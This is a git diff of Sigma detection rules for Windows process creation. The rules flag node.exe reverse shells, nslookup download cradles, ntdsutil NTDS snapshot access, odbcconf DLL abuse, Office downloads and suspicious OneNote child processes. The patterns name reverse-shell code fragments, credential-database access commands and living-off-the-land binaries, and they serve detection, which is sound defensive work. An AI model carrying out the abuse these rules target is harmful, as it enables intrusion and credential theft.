b/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml @@ -1,9 +1,7 @@ title: Potential Arbitrary Code Execution Via Node.EXE id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd status: test -description: Detects the execution node.exe which is shipped with multiple software - such as VMware, Adobe...etc. In order to execute arbitrary code. For example to - establish reverse shell as seen in Log4j attacks...etc +description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return @@ -23,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --eval ' - NewProcessName|endswith: \node.exe + # Add more pattern of abuse as actions + NewProcessName|endswith: \node.exe action_reverse_shell: - CommandLine|contains|all: + CommandLine|contains|all: - .exec( - net.socket - .connect diff --git a/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml index 65f2a491b..102f951c1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml @@ -1,8 +1,7 @@ title: Node Process Executions id: df1f26d3-bea7-4700-9ea2-ad3e990cf90e status: test -description: Detects the execution of other scripts using the Node executable packaged - with Adobe Creative Cloud +description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud references: - https://twitter.com/mttaggart/status/1511804863293784064 author: Max Altgelt (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \Adobe Creative Cloud Experience\libs\node.exe + NewProcessName|endswith: \Adobe Creative Cloud Experience\libs\node.exe filter: - CommandLine|contains: Adobe Creative Cloud Experience\js + CommandLine|contains: Adobe Creative Cloud Experience\js # Folder where Creative Cloud's JS resources are located condition: process_creation and (selection and not filter) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml index e7a2cf3a2..95506a648 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml @@ -1,8 +1,7 @@ title: Network Reconnaissance Activity id: e6313acd-208c-44fc-a0ff-db85d572e90e status: test -description: Detects a set of suspicious network related commands often used in recon - stages +description: Detects a set of suspicious network related commands often used in recon stages references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ author: Florian Roth (Nextron Systems) @@ -20,12 +19,11 @@ detection: EventID: 4688 Channel: Security selection_nslookup: - CommandLine|contains|all: + CommandLine|contains|all: - nslookup - _ldap._tcp.dc._msdcs. condition: process_creation and (1 of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml index 03b30b54e..d772a5ac8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -1,13 +1,12 @@ title: Nslookup PowerShell Download Cradle - ProcessCreation id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 related: - - id: 72671447-4352-4413-bb91-b85569687135 - type: obsoletes - - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 - type: similar + - id: 72671447-4352-4413-bb91-b85569687135 + type: obsoletes + - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 + type: similar status: test -description: Detects suspicious powershell download cradle using nslookup. This cradle - uses nslookup to extract payloads from DNS records +description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \nslookup.exe - - OriginalFileName: \nslookup.exe + - NewProcessName|contains: \nslookup.exe + - OriginalFileName: \nslookup.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' -q=txt ' - ' -querytype=txt ' ParentProcessName|endswith: diff --git a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml index 116b673f5..d39091b03 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml @@ -1,11 +1,10 @@ title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) id: a58353df-af43-4753-bad0-cd83ef35eef5 related: - - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 - type: derived + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived status: test -description: Detects execution of ntdsutil.exe to perform different actions such as - restoring snapshots...etc. +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments @@ -22,16 +21,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ntdsutil.exe - - OriginalFileName: ntdsutil.exe + - NewProcessName|endswith: \ntdsutil.exe + - OriginalFileName: ntdsutil.exe selection_cli: - - CommandLine|contains|all: - - snapshot - - 'mount ' - - CommandLine|contains|all: - - ac - - ' i' - - ' ntds' + - CommandLine|contains|all: + - snapshot + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - ac + - ' i' + - ' ntds' condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage to restore snapshots diff --git a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml index 6e266a0d0..83c3314ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -1,8 +1,7 @@ title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) id: 2afafd61-6aae-4df4-baed-139fa1f4c345 status: test -description: Detects execution of ntdsutil.exe, which can be used for various attacks - against the NTDS database (NTDS.DIT) +description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm author: Thomas Patzke @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \ntdsutil.exe + NewProcessName|endswith: \ntdsutil.exe condition: process_creation and selection falsepositives: - NTDS maintenance diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml index 77eafb092..291992307 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml @@ -1,11 +1,10 @@ title: Driver/DLL Installation Via Odbcconf.EXE id: 3f5491e2-8db8-496b-9e95-1029fce852d4 related: - - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 - type: similar + - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 + type: similar status: experimental -description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a - new ODBC driver. Attackers abuse this to install and run malicious DLLs. +description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -23,16 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'INSTALLDRIVER ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its contents to determine if the action - is authorized. + - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml index 990f16588..6b92d7f2c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Driver/DLL Installation Via Odbcconf.EXE id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 related: - - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 - type: derived + - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where - the driver doesn't contain a ".dll" extension. This is often used as a defense - evasion method. +description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -24,12 +22,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'INSTALLDRIVER ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'INSTALLDRIVER ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml index 1a0f432c1..001096ed0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml @@ -1,8 +1,7 @@ title: Odbcconf.EXE Suspicious DLL Location id: 6b65c28e-11f3-46cb-902a-68f2cafaf474 status: experimental -description: Detects execution of "odbcconf" where the path of the DLL being registered - is located in a potentially suspicious location. +description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + # Note: Add more suspicious locations + CommandLine|contains: - :\PerfLogs\ - :\ProgramData\ - :\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml index a4827e402..42a63a606 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml @@ -1,12 +1,10 @@ title: New DLL Registered Via Odbcconf.EXE id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 related: - - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 - type: similar + - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 + type: similar status: experimental -description: Detects execution of "odbcconf" with "REGSVR" in order to register a - new DLL (equivalent to running regsvr32). Attackers abuse this to install and - run malicious DLLs. +description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -14,8 +12,7 @@ references: - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion @@ -28,16 +25,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'REGSVR ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its content to determine if the action - is authorized. + - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml index 55b8ba7de..b7efed378 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml @@ -1,12 +1,10 @@ title: Potentially Suspicious DLL Registered Via Odbcconf.EXE id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 related: - - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 - type: derived + - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL - in question doesn't contain a ".dll" extension. Which is often used as a method - to evade defenses. +description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -24,12 +22,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'REGSVR ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'REGSVR ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml index 90dcd6191..4bd7e31ad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml @@ -1,20 +1,18 @@ title: Response File Execution Via Odbcconf.EXE id: 5f03babb-12db-4eec-8c82-7b4cb5580868 related: - - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 - type: similar - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 + type: similar + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file which might contain a malicious action. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion @@ -27,19 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' selection_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp condition: process_creation and (all of selection_*) falsepositives: - - The rule is looking for any usage of response file, which might generate false - positive when this function is used legitimately. Investigate the contents - of the ".rsp" file to determine if it is malicious and apply additional filters - if necessary. + - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml index 1938debf6..a836a28d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml @@ -1,13 +1,12 @@ title: Suspicious Response File Execution Via Odbcconf.EXE id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 related: - - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 - type: derived - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 + type: derived + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file with a non-".rsp" extension. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -26,18 +25,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' filter_main_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp filter_main_runonce_odbc: - CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" + # When odbcconf is run with the "/R" flag, it creates a "runonce" key to run at the next reboot + CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" ParentProcessName: C:\Windows\System32\runonce.exe - NewProcessName: C:\Windows\System32\odbcconf.exe + NewProcessName: C:\Windows\System32\odbcconf.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml index 7cf06293c..ed38893e8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml @@ -1,8 +1,7 @@ title: Uncommon Child Process Spawned By Odbcconf.EXE id: 8e3c7994-131e-4ba5-b6ea-804d49113a26 status: experimental -description: Detects an uncommon child process of "odbcconf.exe" binary which normally - shouldn't have any child processes. +description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -24,8 +23,6 @@ detection: condition: process_creation and selection falsepositives: - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process - - Other child processes will depend on the DLL being registered by actions like - "regsvr". In case where the DLLs have external calls (which should be rare). - Other child processes might spawn and additional filters need to be applied. + - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml b/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml index 96f194b5a..e5a93e295 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml @@ -1,8 +1,8 @@ title: Potential Arbitrary File Download Using Office Application id: 4ae3e30b-b03f-43aa-87e3-b622f4048eed related: - - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 - type: obsoletes + - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 + type: obsoletes status: experimental description: Detects potential arbitrary file download using a Microsoft Office application references: @@ -24,16 +24,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - NewProcessName|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_http: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml index dbeffa9d3..96f38faa5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml @@ -1,10 +1,8 @@ title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp id: 551d9c1f-816c-445b-a7a6-7a3864720d60 status: experimental -description: 'Detects suspicious child processes of Excel which could be an indicator - of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - - ' +description: | + Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. references: - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - https://github.com/grayhatkiller/SharpExShell @@ -24,14 +22,14 @@ detection: selection_parent: ParentProcessName|endswith: \excel.exe selection_child: - - OriginalFileName: - - foxprow.exe - - schdplus.exe - - winproj.exe - - NewProcessName|endswith: - - \foxprow.exe - - \schdplus.exe - - \winproj.exe + - OriginalFileName: + - foxprow.exe + - schdplus.exe + - winproj.exe + - NewProcessName|endswith: + - \foxprow.exe + - \schdplus.exe + - \winproj.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml b/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml index 4936fbf0b..5e93d26a4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Office Document Executed From Trusted Location id: f99abdf0-6283-4e71-bd2b-b5c048a94743 status: experimental -description: Detects the execution of an Office application that points to a document - that is located in a trusted location. Attackers often used this to avoid macro - security and execute their malicious code. +description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. references: - Internal Research - https://twitter.com/Max_Mal_/status/1633863678909874176 @@ -23,26 +21,29 @@ detection: EventID: 4688 Channel: Security selection_parent: + # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use ParentProcessName|endswith: - \explorer.exe - \dopus.exe selection_img: - - NewProcessName|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - NewProcessName|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_trusted_location: - CommandLine|contains: + CommandLine|contains: + # Note: these are the default locations. Admins/Users could add additional ones that you need to cover - \AppData\Roaming\Microsoft\Templates - \AppData\Roaming\Microsoft\Word\Startup\ - \Microsoft Office\root\Templates\ - \Microsoft Office\Templates\ filter_main_dotx: - CommandLine|endswith: + # Note: We add this filter to avoid curious people clicking on template files + CommandLine|endswith: - .dotx - .xltx - .potx diff --git a/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml index a5c59bf81..23013778b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml @@ -1,17 +1,14 @@ title: Suspicious Microsoft OneNote Child Process id: c27515df-97a9-4162-8a60-dc0eeb51b775 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes + type: derived status: test -description: Detects suspicious child processes of the Microsoft OneNote application. - This may indicate an attempt to execute malicious embedded objects from a .one - file. +description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18 - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 -author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic - (idea) +author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) date: 2022/10/21 modified: 2023/02/10 tags: @@ -28,78 +25,78 @@ detection: selection_parent: ParentProcessName|endswith: \onenote.exe selection_opt_img: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - NewProcessName|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - NewProcessName|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - 